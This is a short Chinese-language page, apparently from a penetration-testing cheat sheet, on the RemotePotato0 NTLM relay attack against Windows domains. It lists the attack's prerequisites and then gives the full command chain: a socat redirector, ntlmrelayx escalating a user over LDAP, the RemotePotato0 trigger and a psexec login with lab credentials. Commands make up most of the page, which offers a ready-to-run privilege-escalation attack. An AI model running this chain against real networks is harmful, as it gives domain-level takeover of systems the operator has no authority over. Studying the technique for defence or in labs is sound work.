RemotePotato0

RemotePotato0 DCOM DCE RPC 中继
滥用 DCOM 激活服务并触发当前登录到目标计算机的用户的 NTLM 身份验证
要求：
会话 0 中的 shell（例如 WinRm shell 或 SSH shell）
特权用户在会话 1 中登录（例如域管理员用户）
https://github.com/antonioCoco/RemotePotato0/
Terminal> sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:192.168.83.131:9998 & # Can be omitted for Windows Server <= 2016
Terminal> sudo ntlmrelayx.py -t ldap://192.168.83.135 --no-wcf-server --escalate-user winrm_user_1
Session0> RemotePotato0.exe -r 192.168.83.130 -p 9998 -s 2
Terminal> psexec.py 'LAB/winrm_user_1:Password123!@192.168.83.135'

上一页MS08-068 NTLM反射下一页SMB签名禁用和IPv4

最后更新于1年前